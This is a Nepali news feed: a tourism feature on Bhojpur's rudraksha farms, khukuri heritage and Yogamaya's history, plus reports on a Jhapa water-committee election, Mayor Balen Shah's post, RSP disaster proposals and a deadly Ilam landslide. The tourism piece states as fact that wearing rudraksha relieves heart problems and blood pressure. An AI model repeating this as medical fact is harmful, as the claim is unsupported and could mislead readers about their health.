पर्यटन भन्नासाथ कैला कपाल, गोरो अनुहार र अंग्रेजी बोल्ने विदेशीहरू मात्र हुन भन्ने मानसिकता परिवर्तनसँगै त्यो धारणा क्रमशः भत्किँदै गएको छ । नेपालीहरू पनि पर्यटनको लागि आफ्नै देशको भूगोल, संस्कृति, कृषि र उत्पादनप्रति जिज्ञासु हुन थालेका छन । पर्यटकहरू दुर जराजका गाउँमा पुगेर स्थानीय जीवनशैली बुझ्ने, खेत– बारी, बगैंचा र फर्म अवलोकन गर्ने, किसानसँग प्रत्यक्ष संवाद गर्ने प्रवृत्ति बढदो छ । भोजपुरमा घुम्न जाँदा धेरै पर्यटकहरूको ध्यान टयाम्के, सेल्मे, सुन्तले, दिङ्ला, मैयुङ डाँडा, सिलिचुङ, हतुवागढी, साल्पा पोखरी, हाँसपोखरी, घोडेटार आदि स्थानले तान्दछ । तर आजभोलि भोजपुरमा पुग्ने धेरै पर्यटकको पहिलो प्रश्न हुन्छ रुद्राक्ष खेती कहाँ हेर्न पाइन्छ ? भोजपुरका दक्षिणी भेग, अहिले रुद्राक्ष उत्पादनका लागि परिचित गाउँ भएका छन । आजभोलि पर्यटकहरू भोजपुरको रुद्राक्ष फर्म अवलोकन गर्नेहरुको सख्या बढदै गएको छ । भोजपुरमा पुगेपछि पर्यटकहरूले रुद्राक्ष फर्मको अवलोकन मात्र गर्दैनन ग्रामीण जीवनशैलीको अनुभव गर्दै रुद्राक्ष उत्पादन प्रक्रिया बुझछन र किसानसँग अन्तक्र्रिया गर्छन ।
रुद्राक्ष केवल धार्मिक आस्था मात्र होइन यो कृषि पर्यटन र अर्थतन्त्रसँग जोडिएको उत्पादन हो । भोजपुरमा किसानहरूले रुद्राक्षको फर्म विस्तार गर्दै निर्यात गर्न थालेका छन । पर्यटकहरू रुद्राक्षको बोट, प्रशोधन प्रक्रिया र विभिन्न मुखी रुद्राक्ष हेर्न गाउँमा पुग्छन । भोजपुरमा विशेषत किँरात र राई जातिहरूको वाहुल्यता रहेको छ । त्यसको अलवा व्राहमण, क्षेत्री, नेवार, तामाङ, र्शेपा लगायतका जातजातिको पनी वसोवास रहेको छ । रुद्राक्ष हेर्न गाउँमा पुग्दा किँरात र राई जातिहरूको संस्कृतिले पर्यटकहरूलाई नौलो अनुभूति हुन्छ । भोजपुरमा घुम्नको लागि कुनै असुबिधा छैन । आजभोलि ग्रामीण क्षेत्रमा पनि मोटर मार्ग निर्माण भएको । घुम्न जाने पर्यटकहरूसंग आफ्नै साना सवारी साधन भयो भने घुम्ने समय छिटो र धेरै ठाउँमा पुग्न सकिन्छ । भोजपुरमा खान बस्नको लागि ग्रामीण क्षेत्रमा पनि होटल र होमस्टेको सुविधा समेत छ । भोजपुरमा रुद्राक्ष मात्र होइन पर्यटन प्रवद्र्धन गर्नका लागि पर्यटकीय क्षेत्रमा योजनाबद्ध रुपमा चिया खेती विस्तार भएको छ । भोजपुर हिमाली जिल्ला त होइन तर पर्यटकहरूले यात्रामा सगरमाथा, मकालु, कञ्चनजगा र गौरीशंकर लगायत हिमश्रृखलाहरूको अवलोकन गर्न सक्दछन ।
कुनै समय भोजपुर भन्ने बित्तिकै नेपाली जनमानसमा खुकुरीको चमक सँगै वीरताको कथा झल्किन्थ्यो । पूर्वी पहाडको त्यो पहिचान केवल भौगोलिक सीमाभित्र सीमित थिएन । राष्ट्रिय अस्मिता र शिल्पकौशलसँग जोडिएको थियो । आज पनि जब हामी भोजपुर भन्छौं, त्यो नामसँगै परम्परा, तपस्या, विद्रोह र अध्यात्मका अनेक तहहरु खुल्छन । तर समयको प्रवाहसँगै भोजपुरको पर्यटन प्राथमिकता बदलिएको छ । खुकुरीको स्मृतिलाई पछाडि पार्दै रुद्राक्ष खेतीको फर्म पर्यटनका लागि आकर्षण बनेका छन । भोजपुरे खुकुरी केवल घरेलु औजार थिएन । स्थानीय कारीगरको अद्वितीय शिल्पकला थियो । भोजपुर बजार वरिपरिका कालीगढहरूले बनाउने खुकुरीको धार, बनोट र सन्तुलनले खुकुरीलाई देश–विदेशसम्म प्रसिद्ध बनायो । बि.सं १८७२ नेपाल सरकारको पैसा काट्ने टक्सारनै भोजपुरमा थियो । यो काम भोजपुरको तत्कालीन खिका माछा अर्थात बाँडा गाउँ हालको टक्सार बजारमा टकमरी गर्ने काम हुन्थ्यो । त्यस स्थानको नाम अहिले टक्सारले प्रचलित छ । टक्सारको उद्योगबाट कृषि औजार र अन्य भाँडाकुडा बनाउने काम पनि हुन्थ्यो । जसबाट भोजपुरको करुवा, खुकुरीले प्रसिद्धि कमाएको थियो । तर आजभोलि तत्कालीन प्रचलनमा आएका अधिकांश उद्योग बन्द भएका छन् । भोजपुरमा निर्माण हुने विशेष प्रकारको खुकुरीलाइ सिरुपाते खुकुरी भनिन्छ ।
प्राकृतिक रुपमा रुद्राक्ष उत्पादनका लागि भोजपुरको हावापानी र माटो निकै उपयुक्त मानिन्छ । विशेषगरी षडानन्द नगरपालिका, साल्पासिलिछो, रामप्रसाद राई र टेम्केमैयुङ गाउँपालिकाका विभिन्न वडाहरूमा रुद्राक्षका ठूला फर्महरू विस्तार भएका छन । पहिले जङ्गलमा प्राकृतिक रुपमा मात्र पाइने रुद्राक्षलाई अहिले किसानहरूले व्यावसायिक रुपमा खेती गर्न थालेका छन । जसले स्थानीयको आर्थिक जीवनस्तरमा ठूलो परिवर्तन ल्याएको छ । षडानन्द नगरपालिकालाई रुद्राक्षको राजधानीका रुपमा चिनिन थालेको छ । भोजपुरको हावापानी र माटो रुद्राक्ष उत्पादनका लागि उपयुक्त भएकोले फराकिलो क्षेत्रफलमा रुद्राक्षको फर्ममा विकसित गरिएका छन ।  रुद्राक्ष केवल कृषि उत्पादन मात्र होइन, हिन्दू धर्म–संस्कृतिसँग गाँसिएको पवित्र प्रतीक पनि हो । विशेषतः भगवान शिवसँग यसको गहिरो सम्बन्ध मानिन्छ । भोजपुरमा अहिले रुद्राक्ष फर्महरू अवलोकन गर्न विद्यार्थी, अनुसन्धानकर्ता, धार्मिक आस्थावान व्यक्ति र नयाँ ठाउमा घुम्न रुचाउने पर्यटकहरू समेत भोजपुरमा पुगेर रुद्राक्षको बिरुवा कसरी रोपिन्छ भनेर हेर्छन । फल टिप्ने र प्रशोधन प्रक्रिया बुझछन । असली–नक्कली छुटयाउने तरिका सिक्छन । स्थानीय किसानसँग अनुभव साटासाट गर्छन । पर्यटकहरूले गर्दा रुद्राक्ष फर्म अवलोकनसँगै स्थानीय होटल, यातायात, हस्तकला र धार्मिक सामग्रीको व्यापार पनि बढेको छ ।
रुद्राक्ष उत्पत्तिका विभिन्न कथा पुराणहरूमा वर्णित छन । रुद्र भगवान शिवकै एक नाम तथा आक्षको अर्थ आँसु हो । रुद्राक्षलाई कतै भगवान शिवको आँसु तथा कतै पसिना जमिनमा खस्दा त्यसैबाट उत्पन्न भएको बताइएको छ । रुद्राक्ष दानामा हुने प्राकृतिक घेरालाई मुख भनिन्छ । हालसम्म भोजपुरमा एक मुखेदेखि एक्काईस मुखे रुद्राक्षका दाना फेला परेका छन । एकमुखे रुद्राक्षलाई साक्षात शिवस्वरुप मानिने भएकाले यो अमूल्य हुन्छ । रुद्राक्ष भगवान शिवसंग सम्बन्धित भएकाले यसलाई धागोमा उनेर वा मालाका रुपमा धारण गर्दा सकारात्मक उर्जा प्राप्त हुनुका साथै धार्मिक एवं शारीरिक लाभ हुने विश्वास छ । रुद्राक्ष धारण गर्ने व्यक्तिले त्यसबाट समुचित लाभ प्राप्त गर्न मद्य, मांस, लसुन, प्याजजस्ता तामसी भोजन गर्न नहुने मान्यता छ । रुद्राक्षका विषयमा वैज्ञानिक अध्ययन समेत भएका छन भने थप शोध अनुसन्धान जारी छ । रुद्राक्षलाई नीलो संगमरमर पनि भनिन्छ । वनस्पतिशास्त्रमा रुद्राक्षलाई इलियोकार्पस गेनिट्रस भनिन्छ । गोलो, खस्रो, कठोर एवं लामो समयसम्म नबिग्रने रुद्राक्ष वास्तवमा एक प्रकारको बीज हो । पांचमुखी रुद्राक्ष बढी संख्यामा पाइन्छ भने एक र चौधमुखी रुद्राक्ष दुर्लभ हुन्छ । भगवान शिवको प्रतीक मानिने रुद्राक्षलाई भोग तथा मोक्षदायक मानिन्छ । रुद्राक्षका आकार, प्रकार, रङ, रुप, मुख अर्थात पाटारधर्सा आदिका आधारमा उत्कृष्ट, मध्यम र सामान्य मानिन्छ ।  नेपाल, भारत, श्रीलङ्का, थाइल्यान्ड, इन्डोनेसिया, अस्टे«लिया आदि देशमा रुद्राक्ष पाइए पनि नेपालको रुद्राक्ष सर्वाधिक महत्वपूर्ण मानिएको छ ।
इतिहासमा भोजपुरमा रुद्राक्ष विसं १९३२ भन्दा पहिले भारतको काशीबाट ल्याएर बालागुरु षडानन्द अधिकारीले दिङलामा रोपेको जनश्रुति छ । विश्वभरमा रुद्राक्ष १२३ प्रजाति पाइए पनि नेपालको रुद्राक्ष विभिन्न प्रकारको रोगमा समेत प्रयोग हुने गर्दछ । रुद्राक्ष समुद्री सतहदेखी एक हजार चार सय मिटरसम्मको उचाइमा खेती गर्न सकिने विज्ञहरुको भनाइ छ । रुद्राक्ष धार्मिक सँगसँगै सजावट र श्रृङ्गारका लागि पनि प्रयोग हुँदै आएको छ । भोजपुरमा उत्पादित रुद्राक्षबाट माला, ब्रासलेट, कन्ठी, झुम्का, औँठी, पूजा सामग्री लगायतका वस्तुहरू बनाउने गरिन्छ । हाल भोजपुरमा उत्पादन भएका रुद्राक्ष तथा सामग्रीहरू नेपालकै काठमाडौँ, धरान, विराटनगर लगायतका क्षेत्रका साथै भारत र चीनमा समेत निर्यात हुने गरेको छ । रुद्राक्षलाई प्राचीन ग्रन्थहरूमा चमत्कारिक तथा दिव्यशक्ति स्वरुप भनिएको छ । रुद्राक्ष धारण गर्नाले मुटुसम्बन्धी समस्या, रक्तचाप एवम् घबराहट आदिबाट मुक्ति मिल्छ । रुद्राक्षका विषयमा बताइएका चमत्कारिक गुण वास्तविक हुन वा होइनन भन्ने कुरा पत्ता लगाउने उद्देश्यले गरिएका आजसम्मका शोध कार्यबाट कतिपय गुणहरूको पुष्टि भएको छ ।
भोजपुरको षडानन्द नगरपालिका र सदरमुकाम आसपासमा रहेका बजार तथा गाउँमा कार्तिक मङसिर महिनामा चीनबाट आएका रुद्राक्ष व्यापारी देखिन्छन । गाउँघरमा रुद्राक्षलाई दाना भनेर चिन्ने गरिन्छ । भारतीय बजारमा निर्यात हुँदै आएको रुद्राक्ष केही वर्षयतादेखि चीनमा समेत रुद्राक्षको व्यापार हुन थालेको छ । चिनियाँ रुद्राक्ष व्यापारी गाउँ घरसम्म पुगेर किसानसँगै रुद्राक्ष कारोबार गर्न थालेका छन । चिनियाँ बजारमा नेपाली रुद्राक्षको माग बढेपछि त्यहाँका व्यापारी किसानको बोटसम्मै पुगेर रुद्राक्ष खरिद गर्न थालेका छन । चिनियाँ व्यापारीहरूले रुद्राक्षको स्वरुप परिवर्तन गर्दछन । चिनियाँ व्यापारीले रुद्राक्षलाई आवश्यकता अनुसार क्लिप प्रयोग गरेर थेप्चे, कण्ठे, चिल्लो, मदाने र आकारका दानाहरू उत्पादन गरिरहेका छन । चीनमा सजावट र शृंगारिक गहनाका रुपमा रुद्राक्ष प्रयोग गर्ने गरिएको छ । प्राय गरी चिनिया व्यापारीले किसानको बोटबाट नै मोलमोलाई गर्ने गर्दछन । अहिले भोजपुर उत्पादनमुखी धार्मिक–आर्थिक केन्द्रका रुपमा पनि चिनिन थालेको छ ।  विशेषगरी रुद्राक्ष खेती र प्रशोधनले यहाँको स्थानीय अर्थतन्त्रमा नयाँ उर्जा भरेको छ । रुद्राक्षलाई धेरैले केवल धार्मिक आस्थासँग जोडिएको माला वा पूजा सामग्रीका रुपमा मात्र बुझने गर्छन । तर जब पर्यटकले फर्ममा गएर रुद्राक्षको बोट, फल, बीउ, वर्गीकरण, प्रशोधन र बजारसम्मको यात्रा प्रत्यक्ष देख्छन, तब पर्यटकहरू उत्पादनको वैज्ञानिक र आर्थिक पक्षसँग परिचित हुन्छन ।
भोजपुरमा जादा बालागुरु षडानन्द अधिकारीले स्थापना गरेको पहिलो संस्कृत पाठशाला दिङ्ला र योगमायाले जल समाधि लिएको क्षेत्र मझुवाबेँसी धेरै पर्यटकहरू पुग्दछन । आजभन्दा १५२ वर्ष अगाडि विसं १९२४ भोजपुरमा जन्मिएकी योगमाया न्यौपाने सामाजिक आन्दोलनकर्ता हुन । तत्कालीन अस्वथामा समाजको कठोर शासनप्रति विद्रोहको चरम स्वर उराल्ने क्रममा उनले बि.स १९९८ असार २२ गते शनिवार आफ्ना अनन्य भक्तहरू समेतलाई समेटेर जलसमाधि लिएकी थिइन । त्योभन्दा ३ वर्ष अगाडि विसं १९९५ मा आफू लगाएर २४० जनाले सामूहिक अग्नि समाधि लिने घोषणा समेत गरेकी थिइन । राणाकालीन अवस्थ्यामा नारी मुक्तिका कुरा, सति प्रथा, बाल विवाह, उच निच जातजाति उन्मूलन, विधवाले पुनः बिहे गर्न पाउनु पर्छ भन्ने जस्ता अनेकौ क्रान्तिकारी माग राखी राणाहरूको विरुद्धमा आवाज उठाउने नारी हुन योगमाया । तत्कालीन शासन सत्ताको विरुद्धमा आवाज उठाउने क्रममा आफूसहीत ६८ जना एकै साथ अरुण नदीमा जलसमाधि लिने साहस पक्कै सानो थिएन । त्यो सिर्फ आत्महत्या मात्रै थिएन । ठूलो संघर्ष थियो । त्यो सरकारविरुद्घ निकै ठूलो विरोधको अभिव्यक्ति थियो ।
पर्यटनका लागि भोजपुर तपस्या, विद्रोह र उद्यमशीलताको संगम पनि हो । प्राकृतिक सौन्दर्यहरूको संगम, विविध हावापानी र मनोरम दृश्यावलोकन, डाँडाकाँडा, झरना, नदी, कुण्ड, बनस्पति, जंगली जनावर, चराचुरुङगी भोजपुरमा पर्यटकले देख्न सक्दछन । खुकुरीको धार, डिङलाको तपस्या, सतिघाटको बलिदान र रुद्राक्षको हरियाली यी सबै मिलेर भोजपुरको पहिचान भएको छ । पर्यटन केवल घुम्ने मात्र होइन इतिहास, संस्कृति र अर्थतन्त्रलाई एउटै सूत्रमा बाँध्ने माध्यम पनि हो । पर्यटनको दीगो विकासका लागि अब भोजपुरमा खुकुरी शिल्पलाई जीवित संग्रहालयका रुपमा विकास गर्ने, डिङलालाई शिक्षाको ज्योति छर्ने बालागुरु षडानन्द शैक्षिक–आध्यात्मिक अध्ययन केन्द्रका रुपमा प्रवद्र्धन गर्ने, ऐतिहासिक मझुवाबेसीलाई संरक्षण गर्ने र रुद्राक्ष खेतीलाई व्यवस्थित कृषि–पर्यटनमा रुपान्तरण गर्ने । यी चार आयामलाई भोजपुरमा पर्यटन सर्किटका रुपमा विकास गर्न सके पूर्वी नेपालमा नयाँ पर्यटन मानचित्र तयार हुन सक्छ ।
कसरी जाने ?
भोजपुर जानको लागि इटहरीदेखि धरान धनकुटा, मुलघाट हुदै लेगुवा बजार पुग्नु पर्दछ । मुलघाटमा तमोर नदी पर्दछ भने लेगुवामा अरुण नदी । हिलेदेखि लेगुवासम्म २६ किलोमिटर पर्दछ । लेगुवा बजारदेखि अरुण नदीको पुल तरेपछि भोजपुर सुरुहुन्छ । लेगुवाको अरुण नदीको पुल, धनकुटा र भोजपुर जोडने पुल हो । काठमाडौदेखि मध्यपहाडी लोकमार्गबाट यात्रा गर्दा घुर्मी, जयरामघाट खोटाङ भएर पनि भोजपुर पुग्न सकिन्छ । अर्को बाटो हो चतरादेखि मोटरबोटबाट पनि भोजपुरको हतुवागढी पुग्न सकिन्छ । अर्कोतर्फ चतराबाट तमोर करिडोरबाट मोटरमा पनि मुलघाट हुदै लेगुवा बजार पुग्न सकिन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=38570 0
राष्ट्रिय स्वतन्त्र पार्टीको प्यानल विजयी : झापाको चन्द्रगढी दोस्रो खानेपानी समितिमा एमाले – काँग्रेसको दुई दशकीय किल्ला तोडियो https://www.antaranganews.com/?p=36286 https://www.antaranganews.com/?p=36286#respond Wed, 29 Oct 2025 08:05:36 +0000 https://www.antaranganews.com/?p=36286 चन्द्रगढी(झापा)– यहाँको चन्द्रगढी– ९ स्थित चन्द्रगढी दोस्रो खानेपानी उपभोक्ता तथा सरसफाइ समितिको निर्वाचनमा राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)को प्यानलले दुई दशकभन्दा लामो समयदेखि स्थापित रहेको ऋएल्– ग्ःी र नेपाली कांग्रेसको गठबन्धनको राजनीतिक विरासतलाई पूर्ण रूपमा ध्वस्त बनाएको छ । यो निर्वाचनले स्थानीय तहमा समेत ‘रास्वपा’प्रतिको जनआकर्षण र परिवर्तनको चाहना कति बलियो छ भन्ने स्पष्ट सन्देश दिएको छ । रास्वपाले सभापतिसहित दुई तिहाइ बहुमत पदमा कार्तिक ११ गते अवेर घोषित नजिता अनुसार ऐतिहासिक विजय प्राप्त गरेको हो ।
उक्त निर्वाचनमा एमाले– काँग्रेस गठबन्धनको एक प्यानल रहेको थियो भने रास्वपा र राप्रपा एक्लाएक्लै प्यानलबाट निर्वाचन लडेका थिए । पाठकवर्गलाई थाहै छ, झापा नेकपा एमालेका शक्तिशाली अध्यक्ष तथा निवर्तमान प्रधानमन्त्री केपि शर्मा ओली, नेपाली काँग्रेसका महामन्त्री विश्वप्रकाश शर्मा र राष्ट्रिय प्रजातन्त्र पार्टीका केन्द्रीय अध्यक्ष राजेन्द्र लिंदेनको गृह जिल्ला हो । त्यस्तो स्थानमा चन्द्रगढीका सचेत मतदाताहरूले ‘घण्टी’मार्फत रुढीगत राजनीतिलाई कडा चुनौती दिएको रुपमा हेरिएको छ ।
संस्थानको निर्वाचन परिणामअनुसार, राष्ट्रिय स्वतन्त्र पार्टीका जगतप्रसाद तिवारी १९७ मत अन्तरले ४२३ मत प्राप्त गरी सभापति पदमा निर्वाचित हुनुभएको छ । गठबन्धनका उम्मेदवार बद्रीप्रसाद उप्रेतीले २२६ मा मात्र पाउनु भयो भने राप्रपाका खड्गबहादुर ठकुरीले १०२ मत मात्र प्राप्त गरेको निर्वाचन समितिले घोषणा गरेको छ ।
मुख्य पदाधिकारीमा रास्वपाको पूर्ण वर्चस्व रहेको छ । उपसभापतिमा घनश्याम अधिकारीले ३३६ मत प्राप्त गरी विजयी हुुनु भएको छ । उहाँका प्रतिद्वन्द्वी गठन्धनका चिरञ्जिवी भट्टराईले २१० मत र राप्रपाका दिननाथ उप्रेतीले १९० मत पाउनु भएको छ ।
सचिव पदमा भने गठबन्धनका सन्तोषकुमार खड्का राजुले ३२४ मत पाई विजयी हुनु भएको छ । सो पदमा रास्वपाका प्रत्यासी खेमकुमार लुइटेलले २९३ मत पाउनु भयो भने राप्रपाका दुर्गादेवी खनालले १०५ मत पाउनु भएको छ ।
सह–सचिव पदमा रास्वपाका श्रीमती बिमला पौडेल दाहालले ४१३ मत प्राप्त गरी विजयमाला पहिरिनु भएको छ । सो वदमा गठबन्धनका बलनन्द न्यौपानेले २२७ मत र राप्रपाका राजेशसिंह राजवंशीले ६५ मत पाउनु भएको छ । त्यस्तै, कोषाध्यक्ष पदमा श्रीमती कल्पना पौडेल २७१ मतसहित विजयी हुनुभएको छ । सो पदका गठबन्धनका उम्मेदवार खेमकुमारी अधिकारी गौतमले २५३ मत पाउनु भयो भने राप्रपाका हर्कमाया कार्कीले १६३ मत पाउनु भएको घोषणा गरिएको छ ।
यसैगरी सदस्यहरूमा रास्वपाका टेकबहादुर रोका, भिमप्रसाद निरौला, सुरेस घिमिरे र निरा भुजेल विजयी हुनु भएको छ भने गठबन्धनका सुरेश घिमिरे र अग्नीप्रसाद विमली विजयी हुनु भएको छ ।
समितिको कुल सदस्य संख्या ११ जनामा सचिवबाहेक पदाधिकारी र ४ सदस्य गरी ८ पदमा ऐतिहासिक विजय हासिल गर्न सफल भएको छ । यसरी खानेपानी समितिको सञ्चालक समितिमा रास्वपाले दुई तिहाइ बहुमत कायम गर्दै आफ्नो वर्चस्व स्थापित गरेको हो ।
निर्वाचन परिणामामा  परिवर्तनको चाहना’ प्रतिविम्वित :
यस निर्वाचनमा कुल मतदाता ८९५ रहेकोमा जम्मा ७८९ मत खसेको थियो । जसले मतदाताको उत्साहजनक सहभागितालाई देखाउँछ ।
यो जानकारी सार्वजनिक गर्दै भद्रपुर नगर सभापति प्रेम न्यौपानेले विजयलाई सामान्य रूपमा लिन नहुने बताउनुभयो । उहाँले भन्नुभयो, ‘यो जीत सामान्य जीत होइन, देश अब घण्टीमय हुँदैछ भन्ने स्पष्ट सन्देश हो । अब जनताले पुरानो राजनीतिक नेतृत्वबाट परिवर्तन चाहेका छन् । जनताको विश्वास छ कि रास्वपाको घण्टी चिन्हका उम्मेदवारले मात्र व्याप्त भ्रष्टाचार र अनियमितता रोक्न सक्छन्, त्यसैले हामीले यो ऐतिहासिक सफलता प्राप्त गर्यौँ ।’
नयाँ नेतृत्वका चुनौती, अवसर र अपेक्षा :
यो निर्वाचन परिणामले उपभोक्ता तथा मतदाताहरू लामो समयदेखि संस्थागत हुँदै आएको पुरानो राजनीतिक नेतृत्वको सट्टा नयाँ विकल्प खोजेको स्पष्ट संकेत दिएको छ । विशेषगरी, खानेपानी जस्तो अत्यावश्यक सेवा दिने संस्थामा पारदर्शिता र प्रभावकारी सेवा प्रवाहको आवश्यकतालाई मतदाताले प्राथमिकता दिएको देखिन्छ ।
विजयी नेतृत्वले अब दुई दशकदेखिको परम्परालाई तोडेर उपभोक्ताको गुनासो सम्बोधन गर्दै सेवा प्रवाह, वित्तीय पारदर्शिता र उपभोक्ताको हितमा तत्काल सुधार ल्याउने चुनौती र अवसर दुवै प्राप्त गरेको छ । चन्द्रगढीका बासिन्दाले अब नव–निर्वाचित पदाधिकारीहरूबाट स्वच्छ खानेपानीको निरन्तर उपलब्धता र समितिको कुशल व्यवस्थापनको उच्च आकांक्षा राखेको बताएका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=36286 0
जेन जेड आन्दोलनको करिब डेढ महिनापछि खुल्यो मेयर बालेनको मुख : कांग्रेस–एमालेले देश जलाएको दावी https://www.antaranganews.com/?p=36176 https://www.antaranganews.com/?p=36176#respond Thu, 23 Oct 2025 08:32:51 +0000 https://www.antaranganews.com/?p=36176 काठमाडौँ– काठमाडौँ महानगरपालिकाका मेयर बालेन साहको जेन–जी आन्दोलनको झण्डै डेढ महिना पछि मुख खुलेको छ । सो आन्दोलनका क्रममा कांग्रेस–एमालेले देश जलाएको उहाँले सामाजिक सञ्जालमा स्टाटसमार्फत कार्तिक ५ गते त्यस्तो दाजी गर्नु भएको हो ।
उहाँले सामाजिक सञ्जालमा स्टाटस लेख्दै आन्दोलनमा कांग्रेस र एमालेले देश जलाएको तर दोष जेन–जीहरूलाई लगाएको उल्लेख गर्नु भएको छ । मेयर साहले भिसा पाउन नेताहरूको घर धाउनुपर्ने तर उनीहरूले नै अरूलाई विदेशीको एजेन्ट भएको आफ्नो स्टाटसमा जनाउनु भएको छ ।
उहाँले लेख्नु भएको छ, ‘तुइन र काठको पूल बनाउने नेताहरू भन्छन्, यो देश विदेशीले बिगार्यो, भिसा पाउनलाई तिमीहरूको घर धाउनु पर्छ, अरुलाई एजेन्ट भन्छौ ?’
चिया पिउने टाइममा रगत पिउनेहरूले अरूलाई लुसिफरको भन्ने गरेको उहाँको कथन छ ।
‘आन्दोलनमा पुरै देश एमालेले कांग्रेसको जलाउँछ, कांग्रेसले एमालेको जलाउँछ, दोष आफ्नो बाल बच्चालाई दिन्छौ ! चियाको टाइममा रगत पिएर अरुलाई लुसिफर भन्छौ ! लाज लाग्दैन ?’ मेयर साहले थप लेख्नु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=36176 0
रास्वपाले सरकारलाई विपद व्यवस्थापनका लागि दियो २२ बुँदे सुझाव https://www.antaranganews.com/?p=35767 https://www.antaranganews.com/?p=35767#respond Mon, 06 Oct 2025 14:01:46 +0000 https://www.antaranganews.com/?p=35767 काठमाडौं– राष्ट्रिय स्वतन्त्र पार्टी ९रास्वपा० ले विपद् व्यवस्थापनका लागि सरकारलाई २२ बुँदे सुझाव दिएको छ । दलको भर्चुअल बैठकको आधारमा सरकारलाई सुझाव जेठ १९ गते दिइएको हो ।
रास्वपाले राष्ट्रिय स्तरमा जलवायु अनुकूलन र विपद् प्रतिकार्य गुरू योजना ९२०८२–२०९२० तयार गरी, सबै क्षेत्रीय र स्थानीय योजना त्यससँग मिलान गर्ने व्यवस्था गर्न आग्रह गर्ने निर्णय गरेको पार्टीका प्रवक्ता मनिष झाले बताउनु भयो ।
संघीय र प्रदेश सरकारबीच राष्ट्रिय आपतकालीन समन्वय प्रणाली लागू गर्ने, ताकि सूचनाको प्रवाह र निर्णयमा ढिलाइ नहोस् भन्नेमा चनाखो हुनुपर्ने विज्ञप्तिमा उल्लेख छ । विज्ञप्तिमा भनिएको छ, ‘राजनीतिक दल, नागरिक समाज, मिडिया र निजी क्षेत्रबीच समन्वय स्थापित हुने मञ्च गठन गर्ने, ताकि संकटका बेला सबै संयन्त्र एकताबद्ध रूपमा काम गर्न सकुन् ।’
रास्वपाले सबै ७७ जिल्लामा विपद जोखिम न्यूनीकरण तथा व्यवस्थापन ९डिआरआरएम०स्थापना गरी स्थानीय स्तरमै प्रारम्भिक चेतावनी, राहत, पुनर्निर्माण र जनसहभागिता प्रणाली एकीकृत गर्न सुझाव दिएको छ । प्रत्येक तहमा विपद जोखिमको अवस्था हेरी राष्ट्रिय आपतकारी राहत तथा पुनःस्थापना कोष स्थापना गरी तुरुन्त प्रयोग गर्न सकिने कोष सुनिश्चित गर्न रास्वपाको आग्रह छ ।
राष्ट्रिय विपद् प्रतिक्रिया नीतिलाई अद्यावधिक गरी जलवायु अनुकूलन र पुनःस्थापना कार्यक्रमलाई केन्द्रमा राख्नसमेत आग्रह गरेको विज्ञप्तिमा उल्लेख छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=35767 0
रातको समयमा दुई घर हराएपछि विहान मात्र थाहा भयो पहिरोले ८ जना पुरेर ज्यान लिएको https://www.antaranganews.com/?p=35754 https://www.antaranganews.com/?p=35754#respond Sun, 05 Oct 2025 12:00:16 +0000 https://www.antaranganews.com/?p=35754 माइजोगमाई (इलाम)– माइजोगमाई गाउँपालिका– ६ प्याङका दुई घर पहिरोले बगाउँदा ८ जनाको ज्यान गएको छ । सो घट्ना असोज १९ गते राती भएको हो ।
ती घर भएकै ठाउँमा ठूला ढुंगा, गेग्रयानसहितको माटो पनि थुप्रिएको थियो । त्यो दृश्यले बाटो हिँडिरहेका दुई युवालाई झस्कायो । शंका लागेपछि उनीहरूले नजिकै गएर हेरे । छिमेकी गाउँका दुई जना युवा ढुंगामाटोको ढिस्कोनिर पुग्दापुग्दै निश्चित भए, त्यो घर पहिरोले पुरेछ । अघिल्लो साँझ मात्रै त्यही बाटो हिँड्दा देखिएको एउटा घर आज बिहान एकाएक गायब थिए ।
त्यो घट्नामा स्थानीय ८० वर्षीय बमिध्वज सोङ्मीको परिवार बस्ने घर राति नै पहिरोले पुरेको दृश्य देख्नासाथ आत्तिएका उनीहरूले होहल्ला गरे । गाउँले भेला भए । त्यसपछि मात्रै थाहा भयो, परिवारका पाँच जनालाई पहिरोले घरभित्रै ज्यान लिएछ ।
‘त्यो घर नजिकैको बाटो हिँडिरहेका गाउँकै दुई जना युवाहरूले घर नदेखेपछि नजिकै गएर हेर्दा घरै पहिरोले पुरेको थाहा पाएर हल्ला गरेपछि अरूलाई थाहा भएछ,’ माइजोगमाई– ६ का वडाध्यक्ष दिपेश सोङ्मीले भन्नुभयो, ‘गाउँले भेला भएर माटो पन्छाउँदा एकै परिवारका ५ जनाको लास मात्रै फेला प¥यो ।’
वडाध्यक्ष सोङ्मीले सो घटना प्याङ भन्ने ठाउँमा भएको जानकारी दिनुभयो । सोही वडाकै अर्को घर किरण थेवेको थियो, त्यो घर पनि पहिरोले पर्दा तीन जनाको ज्यान गएको छ । बमिध्वजको परिवारका जम्मा पाँच जनाको ज्यान गएको छ । बमिध्वज सोङ्मी, उनकी श्रीमती, छोरा, बुहारी, र १५ वर्षकी नातिनीको ज्यान गएको हो ।
किरण थेवेको परिवारमा किरणसहित तीन जनाको ज्यान गएको छ । किरणकी गर्भवती श्रीमती र एक जना छोरीको पहिरोमा पुरिएर ज्यान गएको वडाध्यक्ष सोङ्मीले बताउनु भयो । उहाँका अनुसार गाउँलेहरूले ८ जनाकै शव निकालेका छन् ।
वडाध्यक्ष सोङ्मीले भन्नुभयो, ‘मेरो अनुमानमा यो घटना राति ३ बजेतिर भएको हो, दुवै घर एकान्त ठाउँमा रहेकाले बिहान मात्रै गाउँलेले घर नदेखिएको अवस्थामा पहिरो गएको पत्ता लगाएका थिए ।’
वडाध्यक्ष सोङ्मीका अनुसार घरभन्दा करिब सय मिटर माथिबाट भीर खसेर घर पुरेछ, अहिले आठ जनाकै शव निकालिएको छ, गाउँमा ठूलो त्रास र शोकको वातावरण छ । बमिध्वज र किरण थेवे दुवैको घर मुख्य गाउँभन्दा एकान्त र भीरको फेदैमा थियो उहाँले सुनाउनु भयो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=35754 0
